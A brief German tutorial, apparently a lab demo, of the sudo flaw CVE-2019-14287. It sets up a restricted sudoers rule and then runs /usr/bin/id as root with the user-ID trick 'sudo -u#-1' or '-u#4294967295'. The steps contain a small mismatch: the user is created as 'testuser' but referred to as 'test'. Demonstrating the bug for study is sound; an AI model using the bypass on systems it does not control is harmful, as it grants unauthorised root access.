
Schritt-für-Schritt-Demonstration der CVE-2019-14287 sudo-Schwachstelle, die es eingeschränkten Benutzern ermöglicht, Befehle als root über manipulierte Benutzer-IDs auszuführen.
4294967295 Sudo-Bug erlaubt eingeschränkten Benutzern, Befehle als Root auszuführen
sudo su - root useradd -m -s /bin/bash testuser passwd testuser // add password to user visudo
test ALL=(ALL, !root) /usr/bin/id // specifying that this user cannot use id command with root user
DATEI SPEICHERN UND VOM ROOT-BENUTZER ABMELDEN
sudo su - test
sudo id SIE ERHALTEN DIE MELDUNG: Entschuldigung, der Benutzer test ist nicht berechtigt, '/usr/bin/id' als root auszuführen.
sudo -u#-1 id ODER sudo -u#4294967295 id
Und schon haben Sie den id-Befehl als Root ausgeführt.